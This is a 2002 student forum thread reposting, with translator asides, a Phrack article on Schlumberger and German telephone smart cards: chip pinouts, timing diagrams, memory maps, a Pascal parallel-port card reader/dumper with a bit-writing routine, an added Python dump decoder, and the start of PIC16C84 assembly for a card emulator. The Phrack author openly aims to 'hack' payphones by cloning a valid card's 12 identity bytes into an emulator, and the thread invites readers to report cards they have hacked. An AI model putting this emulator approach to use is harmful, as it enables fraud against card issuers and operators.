Views: 751  Replies: 7

Make your own "computer-lab card" (Electronics department, 3rd year and up)

This is the first time I have translated an article like this, so there may be mistakes, which is why I made it an English-Chinese parallel text. If anyone spots a problem, please post the correction below. Also, if anyone finds it useful and has made their own phone card, or has "hacked" a lab card or the like in a similar way, let me know. As for why third year and up: I think it needs a certain amount of specialist knowledge; according to our school's electronics curriculum, Microcomputer Interfacing is only taught in the third year, and I think with some of that background this material will not be so hard going.

==Phrack Magazine==

                Volume Seven, Issue Forty-Eight, File 10 of 18

                Electronic Telephone Cards: How to make your own!
                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I guess that Sweden is not the only country that employs the electronic phone card systems from Schlumberger Technologies. This article will explain a bit about the cards they use, and how they work. At the end of this article you will also find a UUEncoded file which contains source code for a PIC16C84 micro-controller program that completely emulates a Schlumberger Telephone card and of course printed circuit board layouts + a component list... But before we begin talking seriously of this matter I must first make it completely clear that whatever you use this information for is entirely YOUR responsibility, and I cannot be held liable for any problems that the use of this information can cause for you or for anybody else. In other words: I give this away FOR FREE, and I don't expect to get ANYTHING back in return!

The Original Telephone Card:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Since I probably would have had a hard time writing a better article than the one Stephane Bausson from France wrote a while ago, I will not attempt to give a better explanation than that one; I will instead incorporate it in this phile, but I do want to make it clear that the following part about the cards' technical specification was not written by me: merely the parts in quotes are things added by me...
Instead I will concentrate on explaining how to build your own telephone card emulator, how the security measures in the payphone system created by Schlumberger Technologies work, and how to trick it... But first, let's have a look at the technical specifications of the various "smart memory card" systems used for the payphones.

------------------------------------------------------------------------------
==============================================================================
              What you need to know about electronic telecards
==============================================================================
   (C) 10-07-1993 / 03-1994   Version 1.06   Stephane BAUSSON
   Email: [email protected]
   Smail: 4, Rue de Grand; F-88630 CHERMISEY; France
   Phone: (33)-29-06-09-89
------------------------------------------------------------------------------
   Any suggestions or comments about phonecards and smart-cards are welcome
------------------------------------------------------------------------------

Content
---------

  I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur: (French cards)
      I-1) Introduction:
      I-2) SCHEMATICS of the chip:
      I-3) PINOUT of the connector:
      I-4) Main features:
      I-5) TIME DIAGRAMS:
      I-6) Memory MAP of cards from France and Monaco:
      I-5) Memory MAP of cards from other countries:

 II ) The cards from ODS: (German cards)
      II-1) Introduction:
      II-2) Pinout:
      II-3) Main features:
      II-4) Time Diagrams:
      II-5) Memory Map:
      II-6) Electrical features:

III ) The Reader Schematic:

 IV ) The program:

------------------------------------------------------------------------------

I ) The cards from Gemplus, Solaic, Schlumberger, Oberthur: (French cards)
==========================================================================

I-1) Introduction:
------------------

You must not think that electronic phone-cards are completely secret things, and that you cannot read the information that is inside. That is quite false: in fact an electronic phonecard does not contain any secret information, unlike credit cards, and an electronic phonecard is nothing else than a 256 bit EPROM with serial output.

Besides, do not think that you are going to refill them once you understand how they work, since for that you would have to reset the 256 bits of the card by erasing the whole card. But the chip is coated in UV-opaque resin, even if sometimes it looks transparent! Even if you were smart enough to erase the 256 bits of the card, you would still have to program the manufacturer area, and this is quite impossible since these first 96 bits are write protected by a lock-out fuse that is fused after the card is programmed in the factory.

Nevertheless it can be very interesting to study how these cards work, to see which kind of data are inside and how the data are mapped, or to see how many units are left, for example. Besides, there are a great number of applications for these cards once they are used up (only for personal usage, of course), since you can use them as a key to open a door, or as a key to secure a program, etc...
These telecards were created in 1984, and at that time the makers decided to build them in NMOS technology; now they plan to change all readers in public booths by 1994 and to use CMOS technology. They also plan to use EEPROM to secure the cards and to add much useful information, so you will perhaps use phone cards to buy your bread or anything else.

These cards are called Second Generation Telecards.

I-2) SCHEMATICS of the chip:
----------------------------

(SUNLX says: I don't need to translate the pin names, do I ;))

                .-------------------.
                |                   |
          --|>  | Clk               |
                |  _                |
          --|   | R/W               |
                |                   |
          --|   | Reset             |
                |                   |
          --|   | Fuse              |
                |                   |
          --|   | Vpp               |
                |                   |
                |       Out         |-- serial output
                '-------------------'

I-3) PINOUT of the connector:
-----------------------------

(SUNLX note: AFNOR is the abbreviation of the French standards association; ISO needs no explanation, it is the international standards organisation.)

       AFNOR CHIP                ISO CHIP
    +-------+-------+        +-------+-------+
    |   8   |   4   |        |   1   |   5   |
    +-------+-------+        +-------+-------+
    |   7   |   3   |        |   2   |   6   |
    +-------+-------+        +-------+-------+
    |   6   |   2   |        |   3   |   7   |
    +-------+-------+        +-------+-------+
    |   5   |   1   |        |   4   |   8   |
    +-------+-------+        +-------+-------+

(SUNLX says: I compared them, and the cards we buy at school are this type ;))

NB: only the position of the chip is ISO standardized, not the pinout.

PINOUT:
-------
    1 : Vcc = 5V        5 : Gnd
    2 : R/W             6 : Vpp = 21V
    3 : Clock           7 : I/O
    4 : Reset           8 : Fuse

I-4) Main features:
-------------------

  - Synchronous protocol.
  - N-MOS technology.
  - 256x1 bit organization.
  - 96 bits write protected by a lock-out fuse.
  - Low power: 85mW in read mode.
  - 21 V programming voltage.
  - Access time: 500ns
  - Operating range: -10°C to +70°C
  - Ten year data retention.

I-5) TIME DIAGRAMS:
-------------------

(SUNLX: heh, if you didn't do well in electrical engineering this one is a bit hard to read :))

[Timing diagram, not reproducible in this text. Signals: Vpp (held at +5V, pulsed to +21V for the write), Reset, Clock, R/W and Out. Sequence shown: card reset, bit 1 reading, bit 2 reading, bit 2 writing to 1 (Vpp and R/W held for 10 to 50 ms), bit 3 reading.]

I-6) MEMORY MAP of cards from France and Monaco:
------------------------------------------------

  Bytes   Bits           Binary      Hexa
                      +-----------+-----+
   1       1 -->   8  |           |     |  ---> Builder code.
                      +-----------+-----+
   2       9 -->  16  | 0000 0011 | $03 |  ---> a French telecard
                      +-----------+-----+
   3      17 -->  24  |           |     |
   4      25 -->  32  |           |     |
   5      33 -->  40  |           |     |
   6      41 -->  48  |           |     |
   7      49 -->  56  |           |     |
   8      57 -->  64  |           |     |
   9      65 -->  72  |           |     |
  10      73 -->  80  |           |     |
  11      81 -->  88  |           |     |
                      +-----------+-----+
  12      89 -->  96  | 0001 0011 | $13 |  ---> 120 units card
                      | 0000 0110 | $06 |  --->  50 units card
                      | 0000 0101 | $05 |  --->  40 units card
                      +-----------+-----+
  13-31   97 --> 248  |           |     |  ---> The units area: each time a unit
                      |           |     |       is used, a bit is set to "1";
                      |           |     |       generally the first ten units are
                      |           |     |       fused in the factory as a test.
                      +-----------+-----+
  32     249 --> 256  | 1111 1111 | $FF |  ---> the card is empty
                      +-----------+-----+
Reply #1
Posted: 2002-10-15 22:32
Re: Make your own "computer-lab card" (Electronics department, 3rd year and up)
II ) The cards from ODS, Giesecke & Devrient, ORGA Karten systeme: (German cards)
=================================================================================

II-1) Introduction:
-------------------

These cards are in fact 128 bit memories in NMOS technology, and the map of these cards is the following:

    64 bit EPROM, write protected (manufacturer area).
    40 bit EEPROM (5x8 bits).   (SUNLX: the bracket presumably means 5 bytes)
    24 bits set to "1".

II-2) Pinout:
-------------

ISO 7816-2

(SUNLX note: this part of the standard covers dimensions and contact specifications. The related standards: ISO 7816-1 physical characteristics; -2 dimensions and contact locations (number and position); -3 electronic signals and communication protocol with the reader; -4 files and interchange commands; -5 Number System and Registration; -6 Inter-Industry Data Elements.)

    +-------+-------+
    |   1   |   5   |        Pinout:
    +-------+-------+        -------
    |   2   |   6   |        1 : Vcc = 5V      5 : Gnd
    +-------+-------+        2 : Reset         6 : n.c.
    |   3   |   7   |        3 : Clock         7 : I/O
    +-------+-------+        4 : n.c.          8 : n.c.
    |   4   |   8   |
    +-------+-------+        n.c. : not connected

(SUNLX: no need to explain this, one look at the diagram is enough.)

II-3) Main features:
--------------------

  - ISO 7816-1/2 compatible.
  - Uses a single 5V power supply.
  - Low power consumption.
  - NMOS technology.

II-4) Time Diagrams:
--------------------

Reset:
------

The address counter is reset to 0 when the clock line CLK is raised while the control line R is high. Note that the address counter cannot be reset when it is in the range 0 to 7.
(SUNLX: though from the diagram it looks like the reset happens on the falling edge, which is odd.)

[Reset timing diagram, not reproducible in this text: Reset goes high and stays high; Clk pulses; the address counter reads n, then 0, 1, 2, 3, 4 on successive Clk pulses; Data shows bit n, then bit 0, bit 1, bit 2, bit 3.]

The address counter is incremented by 1 with each rising edge of the clock signal Clk, for as long as the control line R remains low. The data held in each addressed bit is output to the I/O contact each time Clk falls. It is not possible to decrement the address counter; therefore, to address an earlier bit, the address counter must be reset and then incremented to the required value.

Write:
------

All unwritten or erased bits in the address range 64-104 may be written to. When a memory cell is written to, it is set to 0. The addressed cell is written to by the following sequence:

  1- R is raised while Clk is low, to disable the address counter increment for one clock pulse.
  2- Clk is then raised for a minimum of 10ms to write to the addressed bit.

When the write operation ends and Clk falls, the address counter is unlocked, and the content of the written cell, which is now 0, is output to the I/O contact if the operation was correct.

The next Clk pulse will increment the address by one; then the write sequence can be repeated to write the next bit.
[Write timing diagram, not reproducible in this text: Reset is pulsed high while Clk is low, then Clk is held high for the write window; the address counter reads n, n+1, n+2, n+3; I/O shows bit n, n+1, n+1, n+2, with the two write windows marked.]

WriteCarry:
-----------

A counter stage is erased by performing the WRITECARRY sequence on the stage of the next highest weighting to that to be erased. The writecarry sequence is as follows:

  1 - Set the address counter to an unwritten bit in the next highest counter stage to that to be erased.
  2 - Increment is disabled on the following rising edge of R while Clk remains low.
  3 - Clk is then raised for a minimum of 10ms, while R is low, to write to the addressed bit.
  4 - R is then raised again while Clk remains low, to disable increment a second time.
  5 - Clk is then raised for a minimum of 1ms, while R is low, to write to the addressed bit a second time, erasing the counter level immediately below that of the addressed bit.
[WriteCarry timing diagram, not reproducible in this text: Rst is pulsed twice while Clk is low; Clk is held high once for the write and once for the erase; the address stays at n and then moves to n+1; I/O shows n, then n and n+1; the two Clk highs are labelled Write and Erase.]

II-5) Memory Map:
-----------------

  Bytes   Bits           Binary      Hexa
                      +-----------+-----+
   1       1 -->   8  |           |     |
                      +-----------+-----+
   2       9 -->  16  | 0010 1111 | $2F |  ---> Germany
                      | 0011 0111 | $37 |  ---> Netherland
                      | 0011 1011 | $3B |  ---> Greece
                      +-----------+-----+
   3      17 -->  24  |           |     |
   4      25 -->  32  |           |     |
   5      33 -->  40  |           |     |  ---> Issuer area (write protected)
   6      41 -->  48  |           |     |
   7      49 -->  56  |           |     |
   8      57 -->  64  |           |     |
                      +-----------+-----+
   9      65 -->  72  |           |     |  ---> c4096 )
  10      73 -->  80  |           |     |  ---> c512  )
  11      81 -->  88  |           |     |  ---> c64   )  5 stage octal counter
  12      89 -->  96  |           |     |  ---> c8    )
  13      97 --> 104  |           |     |  ---> c0    )
                      +-----------+-----+
  14     105 --> 112  | 1111 1111 | $FF |
  15     113 --> 120  | 1111 1111 | $FF |  ---> area of bits set to "1"
  16     121 --> 128  | 1111 1111 | $FF |
                      +-----------+-----+

The Issuer area:
----------------

The issuer area consists of 40 bits. The contents of the issuer area are specified by the card issuer, and are fixed during the manufacturing process. The contents of the issuer area will include data such as serial numbers, dates, and distribution centers. This area may only be read.

The Counter area:
-----------------

The counter area stores the card's units. Its initial value is specified by the card issuer and set during manufacturing. The counter area is divided into a 5 stage abacus. Note that you can only decrease the counter; it is not authorized to write into the counter a value greater than the old value.
II-6) Electrical features:
--------------------------

Maximum ratings:
----------------

  +----------------------+--------+------+------+------+
  |                      | Symbol | Min  | Max  | Unit |
  +----------------------+--------+------+------+------+
  | Supply voltage       | Vcc    | -0.3 | 6    | V    |
  +----------------------+--------+------+------+------+
  | Input voltage        | Vss    | -0.3 | 6    | V    |
  +----------------------+--------+------+------+------+
  | Storage temperature  | Tstg   | -20  | +55  | °C   |
  +----------------------+--------+------+------+------+
  | Power dissipation    | Pd     | -    | 50   | mW   |
  +----------------------+--------+------+------+------+

DC characteristics:
-------------------

  +---------------------------+--------+------+------+------+------+
  |                           | Symbol | Min. | Typ. | Max. | Unit |
  +---------------------------+--------+------+------+------+------+
  | Supply current            | Icc    | -    | -    | 5    | mA   |
  +---------------------------+--------+------+------+------+------+
  | Input voltage (low)       | Vl     | 0    | -    | 0.8  | V    |
  +---------------------------+--------+------+------+------+------+
  | Input voltage (high)      | Vh     | 3.5  | -    | Vcc  | V    |
  +---------------------------+--------+------+------+------+------+
  | Input current R           | Ih     | -    | -    | 100  | uA   |
  +---------------------------+--------+------+------+------+------+
  | Input current Clk         | Il     | -    | -    | 100  | uA   |
  +---------------------------+--------+------+------+------+------+
  | Output current (Vol=0.5V) | Iol    | -    | -    | 10   | uA   |
  +---------------------------+--------+------+------+------+------+
  | Output current (Voh=5V)   | Ioh    | -    | -    | 0.5  | mA   |
  +---------------------------+--------+------+------+------+------+

AC characteristics:
-------------------

  +----------------------+--------+------+------+------+
  |                      | Symbol | Min. | Max. | Unit |
  +----------------------+--------+------+------+------+
  | Pulse duration       | tr     | 50   | -    | us   |
  | R address reset      |        |      |      |      |
  +----------------------+--------+------+------+------+
  | Pulse duration       | ts     | 10   | -    | us   |
  | R write              |        |      |      |      |
  +----------------------+--------+------+------+------+
  | High level Clk       | th     | 8    | -    | us   |
  +----------------------+--------+------+------+------+
  | Low level Clk        | tl     | 12   | -    | us   |
  +----------------------+--------+------+------+------+
  | Write window         | Twrite | 10   | -    | ms   |
  +----------------------+--------+------+------+------+
  | Erase window         | Terase | 10   | -    | ms   |
  +----------------------+--------+------+------+------+
  |                      | tv1    | 5    | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv2    | 3.5  | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv3    | 3.5  | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv4    | 3.5  | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv5    | 3.5  | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv6    | 5    | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv7    | 5    | -    | us   |
  +----------------------+--------+------+------+------+
  |                      | tv8    | 10   | -    | us   |
  +----------------------+--------+------+------+------+

III) The Reader Schematic:
==========================

[Reader schematic, ASCII art not reproducible in this text. Recoverable details: the reader hangs off a Centronics port, pin 1 (Str), pins 2-9 (D0-D7), pin 10 (Ack), pin 11 (Busy), pin 25 (Gnd); diodes d1 to d13 are 1N4148; T1 is a BC107 NPN, T2 a BC177 PNP; resistors r1 22k, r2 220, r3 220k, r4 390k, r5 15k, r6 150k, r7 100; a 22.5V battery supplies the programming voltage and an external 5V supply is optional; the chip connector carries the contacts Fuse, Reset, I/O, Clk, Vpp, R/W, Gnd and 5V.]
Reply #2
Posted: 2002-10-15 22:34
Re: Make your own "computer-lab card" (Electronics department, 3rd year and up)
IV) The program:
================

(SUNLX: I don't need to say much about this one; it's the strong point of computer science majors. We learned this language; who says Pascal is useless??)

The following program will enable you to read telecards on your PC if you build the reader.

(SUNLX: presumably it goes with the reader circuit above.)

--------------- cut here (begin)
{*****************************************************************************}
{                         T E L E C A R D . PAS                               }
{*****************************************************************************}
{ This program enables you to dump the memory of electronic phonecards        }
{ from all over the world, so that you will be able to see which country      }
{ the card is from, how many units are left and so on ....                    }
{*****************************************************************************}
{                                                                             }
{ Written by Stephane BAUSSON (1993)                                          }
{                                                                             }
{ Email: [email protected]                                                    }
{                                                                             }
{ Snail Mail Address: 4, Rue de Grand                                         }
{                     F-88630 CHERMISEY                                       }
{                     France                                                  }
{                                                                             }
{*****************************************************************************}
{* Thanks to: Tomi Engdahl ([email protected])                               *}
{*****************************************************************************}

USES crt,dos;

CONST
  port_address=$378;            { lpt1 chosen }

TYPE
  string8=string[8];
  string2=string[2];

VAR
  reg         : registers;
  i,j         : integer;
  Data        : array[1..32] of byte;   { one byte per 8 card bits, byte 1 first }
  car         : char;
  byte_number : integer;                { 32 for a 256 bit card, 16 for 128 bits }
  displaying  : char;                   { 'F' = full format, 'S' = short format }

{-----------------------------------------------------------------------------}
PROCEDURE Send(b:byte);                 { drive the parallel port data lines }
BEGIN
  port[port_address]:=b;
END;

{-----------------------------------------------------------------------------}
FUNCTION Get:byte;                      { read the parallel port status lines }
BEGIN
  get:=port[port_address+1];
END;

{-----------------------------------------------------------------------------}
{ FUNCTION dec2hexa_one(decimal_value):hexa_character_representation;         }
{                                                                             }
{   - convert a 4 bit long decimal number to hexadecimal.                     }
{-----------------------------------------------------------------------------}
FUNCTION dec2hexa_one(value:byte):char;
BEGIN
  case value of
    0..9   : dec2hexa_one:=chr(value+$30);
    10..15 : dec2hexa_one:=chr(value+$37);
  END;
END;

{-----------------------------------------------------------------------------}
{ FUNCTION d2h(decimal_byte):string2;                                         }
{                                                                             }
{   - convert a decimal byte to its hexadecimal representation.               }
{-----------------------------------------------------------------------------}
FUNCTION d2h(value:byte):string2;
VAR msbb,lsbb:byte;
BEGIN
  msbb:=0;
  if ( value >= $80 ) then BEGIN msbb:=msbb+8; value:=value-$80; END;
  if ( value >= $40 ) then BEGIN msbb:=msbb+4; value:=value-$40; END;
  if ( value >= $20 ) then BEGIN msbb:=msbb+2; value:=value-$20; END;
  if ( value >= $10 ) then BEGIN msbb:=msbb+1; value:=value-$10; END;
  lsbb:=0;
  if ( value >= $08 ) then BEGIN lsbb:=lsbb+8; value:=value-$08; END;
  if ( value >= $04 ) then BEGIN lsbb:=lsbb+4; value:=value-$04; END;
  if ( value >= $02 ) then BEGIN lsbb:=lsbb+2; value:=value-$02; END;
  if ( value >= $01 ) then BEGIN lsbb:=lsbb+1; value:=value-$01; END;
  d2h := dec2hexa_one(msbb) + dec2hexa_one(lsbb);
END;

{-----------------------------------------------------------------------------}
Function Binary( b : byte):string8;     { 8 character binary representation }
var weight : byte;
    s      : string8;
BEGIN
  weight:=$80;
  s:='';
  while (weight > 0) do BEGIN
    if ((b and weight) = weight) then s:=s+'1' else s:=s+'0';
    weight:=weight div $02;
  END;
  Binary:=s;
END;

{-----------------------------------------------------------------------------}
FUNCTION Units:byte;    { count the leading "1" bits of the units area (byte 13 on) }
VAR u, i : integer;
    s    : string8;
BEGIN
  u:=0;
  i:=13;
  while (Data[i] = $FF) do BEGIN
    u:=u+8;
    i:=i+1;
  END;
  s:=Binary(Data[i]);
  while(s[1]='1') do BEGIN
    inc(u);
    s:=copy(s,2,length(s));
  END;
  units:=u;
END;

{-----------------------------------------------------------------------------}
function Units_2:LongInt;               { 5 stage counter of the 128 bit cards }
BEGIN
  Units_2:=4096*Data[9]+512*Data[10]+64*Data[11]+8*Data[12]+Data[13];
END;

{-----------------------------------------------------------------------------}
PROCEDURE Card_Type;
BEGIN
  case Data[2] of
    $03: BEGIN
           write('Telecard - France - ');
           case Data[12] of
             $13: write('120 Units - ',units-130,' Units left');
             $06: write('50 Units - ',units-60,' Units left');
             $15: write('40 Units - ',units-40,' Units left');
           END;
         END;
    $2F: BEGIN
           write('Telecard - Germany - ', Units_2, ' Units left');
         END;
    $3B: BEGIN
           write('Telecard - Greece - ', Units_2, ' Units left');
         END;
    $83: BEGIN
           write('Telecard');
           case Data[12] of
             $1E: write(' - Sweden');
             $30: write(' - Norway');
             $33: write(' - Andorra');
             $3C: write(' - Ireland');
             $47: write(' - Portugal');
             $55: write(' - Czech Republic');
             $5F: write(' - Gabon');
             $65: write(' - Finland');
           END;
           if (Data[12] in [$30,$33,$3C,$47,$55,$65]) then BEGIN
             case ((Data[3] and $0F)*$100+Data[4]) of
               $012: write(' - 10 Units - ',units-12,' Units left');
               $024: write(' - 22 Units - ',units-24,' Units left');
               $027: write(' - 25 Units - ',units-27,' Units left');
               $032: write(' - 30 Units - ',units-32,' Units left');
               $052: write(' - 50 Units - ',units-52,' Units left');
               $067: write(' - 65 Units - ',units-62,' Units left');
               $070: write(' - 70 Units - ',units-70,' Units left');
               $102: write(' - 100 Units - ',units-102,' Units left');
               $152: write(' - 150 Units - ',units-152,' Units left');
             END;
           END;
           { write(' - N0 ',Data[5]*$100+Data[6]); }
         END;
  END;
END;

{-----------------------------------------------------------------------------}
PROCEDURE waiting;
BEGIN
  send($00);
  write('Enter a card in the reader and press a key ...');
  repeat until keypressed;
  gotoxy(1, wherey);
  clreol;
END;

{-----------------------------------------------------------------------------}
PROCEDURE Full_Displaying;              { binary dump on the left, hex on the right }
BEGIN
  writeln('Memory dump:');
  for i:=1 to 80 do write('-');
  for i:=1 to (byte_number div 6 + 1) do BEGIN
    for j:=1 to 6 do BEGIN
      if j+6*(i-1) <= byte_number then write(binary(Data[j+6*(i-1)]):9);
    END;
    gotoxy(60,wherey);
    for j:=1 to 6 do
      if j+6*(i-1) <= byte_number then write(d2h(Data[j+6*(i-1)]),' ');
    writeln;
  END;
  for i:=1 to 80 do write('-');
  Card_Type;
  writeln;
END;

{-----------------------------------------------------------------------------}
PROCEDURE Short_Displaying;             { hex bytes only }
VAR j : integer;
BEGIN
  for j:=1 to byte_number do BEGIN
    write(d2h(Data[j]),' ');
  END;
  writeln;
END;

{-----------------------------------------------------------------------------}
PROCEDURE Reading;                      { reset the card, then clock out 256 bits }
VAR i, j  : integer;
    Value : byte;
BEGIN
  send($FE);
  send($F8);
  for i:=1 to 32 do BEGIN
    Value:=0;
    for j:=1 to 8 do BEGIN
      Value:=Value*$02 + ((get and $08) div $08);
      send($FB);
      delay(1);
      send($F8);
    END;
    Data[i]:=Value;
  END;
  case displaying of
    'F':full_displaying;
    'S':short_displaying;
  END;
END;

{-----------------------------------------------------------------------------}
PROCEDURE writing;
VAR i,n : integer;
    car : char;
BEGIN
  write('Which bit do you want to set to "1" : ');
  readln(n);
  waiting;
  car:=readkey;
  send($FA);
  send($F8);
  for i:=1 to n do BEGIN
    send($F9);
    if i=n then BEGIN
      send($FD);
      delay(20);
      send($FF);
      delay(20);
    END;
    send($FB);
  END;
  reading;
END;

{-----------------------------------------------------------------------------}
PROCEDURE Saving;                       { write the hex dump to a text file }
VAR filename : string;
    f        : text;
    i        : word;
BEGIN
  write('Enter the filename: ');
  readln(filename);
  assign(f, filename);
  rewrite(f);
  for i:=1 to byte_number do write(f,d2h(Data[i]),' ');
  close(f);
END;

{-----------------------------------------------------------------------------}
PROCEDURE initialize;
VAR i : integer;
BEGIN
  byte_number:=32;
  displaying:='F';
  clrscr;
  writeln(' 1  - to dump a 256 bits card');
  writeln(' 2  - to dump a 128 bits card');
  writeln(' F  - to display in full format');
  window(41,1,80,25);
  writeln(' S  - to display in short format');
  writeln(' F2 - to save in a file');
  writeln(' Q  - to exit the program');
  window(1,4,80,25);
  for i:=1 to 80 do write('=');
  window(1,5,80,25);
END;

{=============================================================================}
BEGIN
  initialize;
  repeat
    waiting;
    car:=upcase(readkey);
    case car of
      'W'     : writing;
      'Q'     : ;
      '1'     : byte_number:=32;
      '2'     : byte_number:=16;
      'F','S' : displaying:=car;
      #00     : BEGIN                   { extended key: F2 = #60 }
                  car:=readkey;
                  if car=#60 then saving;
                END;
      else reading;
    END;
  until car='Q';
END.
--------------- cut here (end)
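As an added example (not from the Phrack article, from Bausson's TELECARD.PAS, or from the translator), here is a Python decoder for the memory maps of sections I-6 and II-5: the same fields that Card_Type, Units and Units_2 work out in the Pascal program above. It reads a dump in the reader's short hex format, decodes the builder code, country byte and card-type byte, counts the fused bits in the units area, and checks that the fused bits form one contiguous run from the start of the area, which is what the write-once, set-to-"1" process described in the map should always produce; a run with holes is a sign the dump is inconsistent or the card was not written the documented way. The two hex dumps, the FACTORY_TEST_BITS constant and the units-left arithmetic (face value minus the fused bits beyond the ten factory test bits) are this example's own assumptions drawn from the wording of the map; for the 128-bit cards the counter value is computed exactly as the Pascal function Units_2 does.

```python
"""Decode raw telecard memory dumps (sections I-6 and II-5).

Added example, not from the Phrack article, TELECARD.PAS or the translator.
The sample dumps below are constructed for illustration; they are not real cards.
"""

# Byte 2 values named in the memory maps and in Card_Type.
COUNTRY_CODES = {0x03: "France", 0x2F: "Germany", 0x37: "Netherlands", 0x3B: "Greece"}

# Byte 12 values for French cards (section I-6): face value in units.
FRENCH_FACE_VALUES = {0x13: 120, 0x06: 50, 0x05: 40}

# The map says the first ten units are generally fused in the factory as a
# test; treating exactly ten as non-chargeable is this example's assumption.
FACTORY_TEST_BITS = 10

# Constructed dumps in the reader's short format (byte 1 first).
FRENCH_SAMPLE_HEX = ("01 03 00 00 00 00 00 00 00 00 00 13 FF FE "
                     "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 FF")
ODS_SAMPLE_HEX = "00 2F 11 22 33 44 55 66 00 00 00 03 05 FF FF FF"


def parse_dump(hex_text: str) -> bytes:
    """Turn the reader's space-separated hex output into bytes."""
    raw = bytes.fromhex(hex_text.replace(" ", ""))
    if len(raw) not in (16, 32):
        raise ValueError(f"expected 16 or 32 bytes, got {len(raw)}")
    return raw


def units_bits_consistent(units_area: bytes) -> bool:
    """True if every '1' bit sits in one run at the start of the area.

    Units are consumed by setting the next bit to '1' and bits cannot be
    cleared, so a '1' after the first '0' is inconsistent with that process.
    """
    bits = "".join(f"{b:08b}" for b in units_area)
    leading = len(bits) - len(bits.lstrip("1"))
    return "1" not in bits[leading:]


def decode_french_card(dump: bytes) -> dict:
    """Interpret a 256-bit French/Monaco card per the section I-6 map."""
    if len(dump) != 32:
        raise ValueError("French cards are 256 bits (32 bytes)")
    if dump[1] != 0x03:
        raise ValueError(f"byte 2 is {dump[1]:#04x}, not a French telecard")
    face = FRENCH_FACE_VALUES.get(dump[11])
    if face is None:
        raise ValueError(f"unknown card type byte {dump[11]:#04x}")
    units_area = dump[12:31]                      # bytes 13..31, bits 97..248
    fused = sum(bin(b).count("1") for b in units_area)
    used = max(fused - FACTORY_TEST_BITS, 0)
    return {
        "builder_code": dump[0],
        "country": COUNTRY_CODES[dump[1]],
        "face_value": face,
        "fused_bits": fused,
        "units_used": used,
        "units_left": face - used,
        "consistent": units_bits_consistent(units_area),
        "tail_ff": dump[31] == 0xFF,              # byte 32 reads $FF in the map
    }


def decode_ods_card(dump: bytes) -> dict:
    """Interpret a 128-bit ODS-style card per the section II-5 map."""
    if len(dump) != 16:
        raise ValueError("ODS cards are 128 bits (16 bytes)")
    b = dump
    # Bytes 9..13 are the c4096, c512, c64, c8, c0 counter stages; the
    # weighting below is exactly the Pascal function Units_2.
    units_left = 4096 * b[8] + 512 * b[9] + 64 * b[10] + 8 * b[11] + b[12]
    return {
        "country": COUNTRY_CODES.get(b[1], f"unknown ({b[1]:#04x})"),
        "issuer_area": b[2:8].hex(),              # bytes 3..8, read-only
        "units_left": units_left,
        "tail_ff": all(x == 0xFF for x in b[13:16]),   # bytes 14..16 set to "1"
    }


def describe(hex_text: str) -> dict:
    """Dispatch on dump length, as the reader's '1'/'2' menu choices do."""
    dump = parse_dump(hex_text)
    return decode_french_card(dump) if len(dump) == 32 else decode_ods_card(dump)


if __name__ == "__main__":
    for name, sample in (("French", FRENCH_SAMPLE_HEX), ("ODS", ODS_SAMPLE_HEX)):
        print(name, describe(sample))
```

Feed `describe()` the line that Short_Displaying prints (or the file that Saving writes) and it returns the decoded fields as a dictionary; the `consistent` flag is the check worth logging if you are comparing many dumps, since a legitimately worn card can never produce a '1' after a '0' in its units area.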
Reply #3
Posted: 2002-10-15 22:36
Re: Make your own "computer-lab card" (Electronics department, 3rd year and up)
The Program:
~~~~~~~~~~~~

Well, when I saw this phile about the cards the first time, about a year ago, I quickly realized that this system is very insecure and really needs to be hacked. So, now I present you with a piece of software for the PIC 16C84 RISC micro-controller from Microchip that will take care of emulating the cards used by Schlumberger and others.

A year ago, when I first saw the article about phone cards, I quickly realized that this system is very insecure and well worth hacking. So I am attaching a program written for the PIC16C84 RISC microcontroller made by Microchip; it can emulate for you the operation of cards made by Schlumberger and some other companies.

This system is to be found in Scandinavia (Sweden, Norway and Finland), Spain, France and other countries. I do know that France probably needs some small modifications for this to work, but I see no reason as to why it shouldn't do so!

This kind of phone card system can be found on the Scandinavian peninsula (Sweden, Norway and Finland), as well as in Spain, France and some other countries. I also know that the French system may need some small modifications, but I see no reason why it should not work.

For this to work, you need to have access to a PROM burner which can handle the PIC 16C84, or you might just build one yourself as I include some plans for that in the UUEncoded block to be found at the end of this phile. First of all, you have to read off the first 12 bytes of data from a valid card from the country you wish your emulator to work in.

To do this, you need access to a PROM programmer that can handle the PIC16C84 chip, or you can build one yourself; at the end of this article I give some design drawings, encoded with UUencode. First, you have to find a valid card used in the country you want to emulate, then read out the first 12 bytes of data stored in it.

This because I don't think it would be a good idea to publish stolen card identities in Phrack. Then you simply enter those 12 bytes of data in the proper place in my program and compile it.

This is because I think it would not be a wise thing to blatantly post stolen phone card identities in Phrack. In fact you only need to enter these 12 bytes of data in the appropriate place in my program and compile it.

That's it... And since I happen to choose a version of the PIC with internal Data EEPROM, that means that the first 12 locations of the Data EEPROM should contain the card id bytes. As of today this code should work smooth and fine, but maybe you'll need to modify it later on when Schlumberger gets tired of my hack.

That's it. Because I chose a PIC chip with internal EEPROM storage, the first 12 locations in its EEPROM must contain the card's identification information. As of today this code still runs fine, but perhaps later, once Schlumberger gets tired of my hack, you will have to modify it again.

But since the PIC is a very fast and powerful micro-controller it might be quite hard for them to come up with a solution to this problem. Let's have a look at the PIC Software! (Note that the current version of Microchip's PICSTART 16B package is unable to program the DATA EEPROM array in the 16C84 so if you are going to use that one, use the other version of the source code which you'll find in the UUEncoded part!).

But since the PIC is a fast and powerful microcontroller, it should be hard for them to keep up with us in solving this problem. Now let's look at the PIC software! (Note: the latest version of Microchip's PICSTART 16B package cannot program the EEPROM data in the 16C84, so if you are going to use that one, look for the other version of the code in the UUEncoded part at the end of the article.)

..Typical assembly language; third-year EE students should all have studied it. Even if you can't write it, reading it should be no problem, right?

==============================================================================
        TITLE   "ISO 7816 Synchronous Memory Card Emulator"
        LIST    P=PIC16C84, R=HEX
        INCLUDE "PICREG.EQU"

; PIC16C84 I/O Pin Assignment List

CRD_CLK equ     0               ; RB0 + RA4 = Card Clock
